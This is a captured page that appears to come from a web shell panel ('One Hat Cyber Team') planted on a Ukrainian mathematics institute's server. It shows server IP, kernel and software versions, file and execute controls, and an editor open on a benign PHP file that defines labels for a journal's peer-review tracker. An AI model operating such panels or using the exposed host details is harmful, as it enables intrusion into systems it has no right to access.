One Hat Cyber Team
Your IP :
216.73.216.80
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nosc
/
public_html.2006-04-15
/
admin0
/
Edit File:
defs_articles.php
<?php $Columns = array ( "id" => enruua("Article ID","Регистрационный номер статьи","Реєстраційний номер статті"), "language" => enruua("Language","Язык","Мова"), "title_en" => "Article title", "title_ru" => "Название", "title_ua" => "Назва", "received" => enruua("Reception date","Дата получения", "Дата отримання"), "accepted" => enruua("Date when accepted","Дата принятия к печати", "Дата прийняття до друку"), "status" => enruua("Article status","Состояние статьи","Стан статті"), "referee_1" => "1-й рецензент The 1<sup>st</sup> referee", "sent_to_referee_1" => "Дата посылки 1-му рецензенту/Sent to the 1<sup>st</sup> referee on", "received_from_referee_1" => "1-я рецензия получена/The 1<sup>st</sup> referee's report received on", "sent_to_author_1" => "The 1<sup>st</sup> referee's report sent to the author on", "received_from_author_1" => "The 1<sup>st</sup> revision received on", "referee_2" => "The 2<sup>nd</sup> referee", "sent_to_referee_2" => "Sent to the 2<sup>nd</sup> referee on", "received_from_referee_2" => "The 2<sup>nd</sup> referee's report received on", "sent_to_author_2" => "The 2<sup>nd</sup> referee's report sent to the author on", "received_from_author_2" => "The 2<sup>nd</sup> revision received on", "published_volume" => "Том/Journal volume", "published_year" => "Год/Journal year", "published_number" => "Номер/Journal number", "published_page_start" =>"Начальная страница/Starting page", "published_page_end" => "Конечная страница/Ending page", "abstract" => "Аннотация/Abstract", "notes" => "Примечание/Notes"); $Status= array("rejected" => "<em><font color=red>Rejected</font></em>","review_1" => "<em><font color=#00698e>Under the 1<sup>st</sup> refereeing</font></em>", "review_2" => "<em><font color=#00868e>Under the 2<sup>nd</sup> refereeing</font></em>", "accepted" => "<em><font color=blue>Accepted</font></em>", "published" => "<em><font color=green>Published</font></em>" ); $Status_brief = array("rejected" => "Отклонена","review_1" => "1-е рец.", "review_2" => "Повт. рец.", "accepted" => "Принята", "published" => "Опубликована" ); function Important_column($string) { if ($string=="id" | $string=="title" | $string=="received" |$string="status") {return 1;} else return 0; } ?>
Simpan